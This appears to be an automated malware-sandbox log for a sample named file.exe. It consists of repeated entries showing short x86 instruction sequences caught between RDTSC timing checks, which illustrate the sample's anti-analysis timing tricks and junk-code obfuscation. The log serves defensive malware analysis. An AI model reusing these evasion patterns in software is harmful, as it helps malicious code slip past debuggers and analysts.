Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118C8E2 second address: 118C95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F626C9C9A34h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F626C9C9A28h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1FF0h], eax 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov ebx, dword ptr [ebp+122D262Bh] 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov edi, ebx 0x00000043 mov eax, dword ptr [ebp+122D0705h] 0x00000049 movzx edi, cx 0x0000004c push FFFFFFFFh 0x0000004e mov di, 0AACh 0x00000052 mov edi, dword ptr [ebp+122D37F0h] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118C95B second address: 118C960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E9AB second address: 118EA56 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F626C9C9A34h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F626C9C9A28h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D29C0h], ecx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F626C9C9A28h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov ebx, dword ptr [ebp+122D1BF7h] 0x0000005d jmp 00007F626C9C9A37h 0x00000062 mov eax, dword ptr [ebp+122D0285h] 0x00000068 sub dword ptr [ebp+122D32C5h], esi 0x0000006e movsx edi, si 0x00000071 push FFFFFFFFh 0x00000073 or ebx, dword ptr [ebp+122D38D8h] 0x00000079 push eax 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118EA56 second address: 118EA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119166D second address: 1191695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F626C9C9A43h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1191695 second address: 1191699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1190799 second address: 11907A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F626C9C9A26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11907A4 second address: 11907D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F626D6E9A71h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11917D8 second address: 11917DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11917DC second address: 11917E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11935C9 second address: 11935CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11935CD second address: 11935D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11927F3 second address: 119280A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007F626C9C9A26h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F626C9C9A38h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119280A second address: 119280E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11946E0 second address: 11946EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F626C9C9A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119BA3A second address: 119BA6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626D6E9A70h 0x00000009 popad 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F626D6E9A79h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119BA6E second address: 119BA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119BA72 second address: 119BA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119BA76 second address: 119BAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F626C9C9A2Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F626C9C9A38h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1134578 second address: 113457D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119B2D6 second address: 119B2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119B2DA second address: 119B306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A75h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F626D6E9A6Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A0EE4 second address: 11A0F12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F626C9C9A2Eh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A67DE second address: 11A67ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A67ED second address: 11A67F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A67F6 second address: 11A67FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A54AF second address: 11A54B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5A4F second address: 11A5A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5A53 second address: 11A5A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5A57 second address: 11A5A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5BD3 second address: 11A5BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5EC4 second address: 11A5EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Ch 0x00000007 jmp 00007F626D6E9A70h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5EE8 second address: 11A5EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5EEC second address: 11A5F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F626D6E9A6Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F626D6E9A72h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6029 second address: 11A6033 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6033 second address: 11A6067 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F626D6E9A66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F626D6E9A68h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jg 00007F626D6E9A7Dh 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F626D6E9A75h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6067 second address: 11A6081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626C9C9A36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6081 second address: 11A6085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A61E6 second address: 11A61EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A61EC second address: 11A61FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F626D6E9A74h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A61FB second address: 11A61FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A662C second address: 11A663D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F626D6E9A6Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A663D second address: 11A6643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6643 second address: 11A6647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A9BDC second address: 11A9BF0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F626C9C9A26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F626C9C9A40h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B2CAF second address: 11B2CD3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F626D6E9A68h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F626D6E9A73h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B2CD3 second address: 11B2CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B3218 second address: 11B3246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626D6E9A79h 0x00000009 jmp 00007F626D6E9A6Ah 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B3246 second address: 11B324E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B3525 second address: 11B3543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F626D6E9A72h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B3543 second address: 11B3564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F626C9C9A2Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B7E05 second address: 11B7E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 jmp 00007F626D6E9A79h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11829D1 second address: 11829D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182ADD second address: 1182AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626D6E9A6Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jbe 00007F626D6E9A66h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182BB7 second address: 1182BE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e jnp 00007F626C9C9A2Ch 0x00000014 pop esi 0x00000015 mov eax, dword ptr [eax] 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007F626C9C9A26h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182CE3 second address: 1182CF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182D89 second address: 1182D8F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182F93 second address: 1182F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182F97 second address: 1182F9D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118358D second address: 1183593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183833 second address: 1183837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183837 second address: 116242C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F626D6E9A68h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+124624B3h], edx 0x0000002a lea eax, dword ptr [ebp+12486307h] 0x00000030 push eax 0x00000031 pushad 0x00000032 jmp 00007F626D6E9A70h 0x00000037 jmp 00007F626D6E9A6Bh 0x0000003c popad 0x0000003d mov dword ptr [esp], eax 0x00000040 movsx edx, bx 0x00000043 call dword ptr [ebp+122DBB04h] 0x00000049 pushad 0x0000004a jp 00007F626D6E9A68h 0x00000050 push eax 0x00000051 push edx 0x00000052 push esi 0x00000053 pop esi 0x00000054 push eax 0x00000055 pop eax 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B7254 second address: 11B7267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F626C9C9A2Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B7267 second address: 11B729B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F626D6E9A6Ch 0x0000000b je 00007F626D6E9A66h 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F626D6E9A68h 0x0000001c push ebx 0x0000001d jmp 00007F626D6E9A6Dh 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B729B second address: 11B72A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B72A1 second address: 11B72A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B72A7 second address: 11B72AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B7586 second address: 11B758A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B76C4 second address: 11B76EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c jbe 00007F626C9C9A73h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F626C9C9A33h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC0B7 second address: 11BC0EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F626D6E9A6Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F626D6E9A70h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F626D6E9A73h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC0EE second address: 11BC11E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F626C9C9A26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007F626C9C9A30h 0x00000014 pop ecx 0x00000015 push edi 0x00000016 js 00007F626C9C9A26h 0x0000001c pop edi 0x0000001d jbe 00007F626C9C9A2Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC277 second address: 11BC27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC27B second address: 11BC27F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC27F second address: 11BC285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC285 second address: 11BC28B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC28B second address: 11BC295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F626D6E9A66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC295 second address: 11BC299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC827 second address: 11BC82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BC9B3 second address: 11BC9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BCB7A second address: 11BCBA9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F626D6E9A71h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F626D6E9A77h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0A3C second address: 11C0A66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A39h 0x00000007 jg 00007F626C9C9A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0471 second address: 11C0490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F626D6E9A78h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0490 second address: 11C049C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F626C9C9A26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C077E second address: 11C078D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F626D6E9A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C27F7 second address: 11C2806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnp 00007F626C9C9A26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C2806 second address: 11C280A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C2950 second address: 11C2956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C8257 second address: 11C826E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C826E second address: 11C827A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F626C9C9A26h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CA192 second address: 11CA197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
